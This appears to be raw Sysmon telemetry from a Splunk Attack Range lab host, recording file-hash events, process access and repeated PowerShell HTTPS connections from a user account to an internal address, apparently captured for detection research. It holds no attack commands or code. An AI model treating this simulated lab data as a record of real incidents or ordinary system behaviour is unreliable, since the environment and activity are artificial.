Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4781E42131BE396298230994E83719BE,SHA256=06864A0B8837063C4061CEDA18D67FF2985AF2DE48B8C87B528D8634C1EFA832,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342044Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:37.058{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=961EFB2A6EC6532AEDD7B91C8AD4F175,SHA256=1CBD890CBB6A090B976580EBEDCE0551AAAC721138A7731E99C9C26FFDAE5A85,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342047Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:03.004{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52373-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342046Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:38.319{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B90039EC202AB80B0D5778E2E6D440B,SHA256=4F607CDE7E956C1A2BE337C053975653FC4BB99006B9C0DCB85B157EEF00FD0B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342048Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:39.320{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F6FA49682D7C5FE61CC4857E44071CF,SHA256=BA566274DC62C232ED7E79C98024E757F6982E09666D838A7F2717ED96DFB8D5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342049Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:40.338{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4B6F70AE03EB835A1E276089F5CAAAB,SHA256=8CB60BDC05CFEE153EDE6FA078DECC45B580DBFA8AEB27B0A250D2AF0B8BF96C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342053Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:07.117{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52375-false10.0.1.12-8000- 354300x800000000000000035342052Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:07.017{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52374-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342051Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:41.356{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42234BC6A60BF0235D99185191CD4585,SHA256=59CC91E827670423360C3CC2179FBF5E68501B085B488AC5846929040FADA13D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342050Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:41.056{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A2B032E08BEBE38D9491279D23EFCD51,SHA256=B67FF9577006F354521B9E44577DB42733B8879B7722C41E9C18432DE54314B5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342054Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:42.386{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B726F850E5D42E73C0E495885D38D609,SHA256=53E85BEE376119DD8920E8C314D9983121B96B0A5F9EA480FB7D0B003B0C5DB0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342055Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:43.401{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B4BB846E8293B21C25014A62358C930,SHA256=AA01F341A06CCB61DAC64CE4DE7C3DCC79C2DD82D7B0E2F30B820AA2224A57D5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342057Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:44.868{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=FEB9ADA83D21970F110AAF8A18D14179,SHA256=EC6DDB95B965F0CD9F6DED6049598679122D089B669E9A0E79BB66050DD96A33,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342056Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:44.416{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B7BA1C7F6B95AE52655EC75BA18521C,SHA256=5CA65F2139452CD52753249C12B7B2000090F99BE674D9C14A98B275056FF841,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342058Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:45.433{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F14D6C66865CC86C3275952803B1959,SHA256=5B8254800E7AEB7FDC60891D82FB24C031E71931E434CB041D39CC945216E303,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342059Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:46.467{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE0977314D80CA11B437BCFC087EEF33,SHA256=9099D2089A8F1308C1D510AA7101203ED62DCAEBBB3E6BA2CE6F5B2731FA4ADE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342062Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:12.228{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52376-false10.0.1.12-8000- 23542300x800000000000000035342061Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:47.496{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5358A05CEA688DFE066BA1E5F7126961,SHA256=55DC82F87397498C50ECFC83F2D265A63E24C11ADC9858E5C5C0C6EE7B0FD213,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342060Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:47.066{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=66A70077991B8C15481FAA284DD6E998,SHA256=05E985CB35AC715FA1C3ED9A84D5D5050D3AAC28145FFD32152DDE55B2B95F9C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342064Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:13.028{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52377-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342063Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:48.512{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA770060B0BA1AFB0EE1CD5D167F50A6,SHA256=E86A1CEEE3741C79BBC1C540D831E2F2C02C1DDCBBE27A185B1BAFC08A25F7C1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342065Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:49.530{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53AF82ECBEA6AFB0503DD01C4CF28D4A,SHA256=11B8FBDB46FBCD4962A972AC2E9E62A133C3B73EE5E4B899482781B86B9AEEB8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342066Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:50.547{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA03DAF45518EDC32CE48CB8947DE6BF,SHA256=2A70FBD9CA0D657219E51355F3ECE9E1923708C8BA7EB5408A070E2AAFDB1FDE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342068Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:51.609{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEF3839B49F495D16474BE50FD7E122D,SHA256=5DA7911F1E17F4B92FDFF0A001087B018C60B6ADE44272CB57D627D04FB5AD10,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342067Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:51.309{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F3F31AF4FBEE28A70999CF4229CC0C78,SHA256=FCCAEB3A3F275BB689BE5C6B5A2A68B10E2CC9E97BACE5F480E49FC0F6BE378D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342071Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:18.045{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52379-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035342070Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:18.026{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52378-false10.0.1.12-8000- 23542300x800000000000000035342069Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:52.629{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1C886FD342CB18D64D8CE0D826936CE,SHA256=35224260D2F67F928B0E97DCCA59C74E7575E9D3185795FEA64EA758E52AD56A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342072Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:53.644{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E7B7757889B1D8B6B14BDB9B3537E7C,SHA256=1579694FD75C556B4E542362810B1044AF5661A422D50EC0ED2B0F8D37320910,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342073Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:54.659{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A161ECAA4B604B2D9AED0AAB405A796,SHA256=CFD62552596B0AB18A19E51F592849E345A10A0702481B5A7554BC3E780A27EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342074Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:55.689{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96F8AEB690FBCA0454535E1C6BCCFEF5,SHA256=C7B466CAD128A2D07490088C8F88B45DE985259F6C9763653A8A7B47F11162CE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342076Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:56.723{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DEFDE510E36F48B6F811A49F6D9C96A,SHA256=E2B5EB13A87C6C7FCDEE03FE4861DD29A198EC49DE27A5D272760F10AAC0507A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342075Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:56.189{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=931F6AFBFA9DDE0479678B481258EBDC,SHA256=A001847F9FC33D7C8D222B63055227BD4BF73566E236321DDD96399A22E0C9BE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342078Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:57.756{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33E19B96F1A57F2898DFA36FFC6AA9C4,SHA256=793D3F8BBBE295DF7FC9C37BF14EACB5AFFF53E18A5AC05F61F38F1FE2A48D3D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342077Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:22.057{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52380-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342080Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:58.771{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C0984C4711BCC8889812C4DFF3AEB08,SHA256=BD06D66A7A04799E269040B5CBA1D773E8D6615155C3BB48374EF2506B6CAFC7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342079Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:23.041{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52381-false10.0.1.12-8000- 23542300x800000000000000035342081Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:59.774{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=989EB0FE950653525A62CC4A4EA9467C,SHA256=72E07FB5BFEC83A0D93D3FC8508E37B7F5C41C94E41028BDD1724BF1EEDE7766,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342083Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:00.790{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF3EFEC3DC4A0E7283A3B0BE0EFE8D1D,SHA256=C950D1251A64A42AAF057E180043E0049013EB1541A61BF556F30FF7A450A69E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342082Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:00.159{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=1276348A846F709555F41CB92FA7E5F7,SHA256=58F21794D0A9AC8894E92EABA577C80A144F6C2238F9FF29EDF66E560C71ED3A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342085Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:01.806{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE70A6A62583DA6E47D5B5799F2E08B8,SHA256=75D48E05CBA612160EEC9C7EFD9AB9DD04136B39CB0ACFCB2B79605B2B11D765,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342084Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:26.070{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52382-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342086Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:02.829{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04DC66D1660AFFF74D2494DBABDF68FE,SHA256=1978E10DCF3BD67E1A6528A4BFFA80F1AD12EB22FB4ABFE5B20642FE18056D9B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342088Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:03.858{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16F57DB41AEC578FA7366345C315AF79,SHA256=C15D9896020D13681D75D2D4501DD6389CE3DB3D5280894982DFAC516FD57175,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342087Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:28.158{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52383-false10.0.1.12-8000- 23542300x800000000000000035342106Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:04.878{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAA6AA81CCEA2614447E46BFCC2C9387,SHA256=FB2DD2AA923E1DE3E15F0AEA127D815869FB9C965D301F7F7949FB4326BFEBC4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342105Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:04.692{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-727C-613B-28B4-03000000C801}6516C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342104Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:04.692{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342103Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:04.692{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342102Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:04.692{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 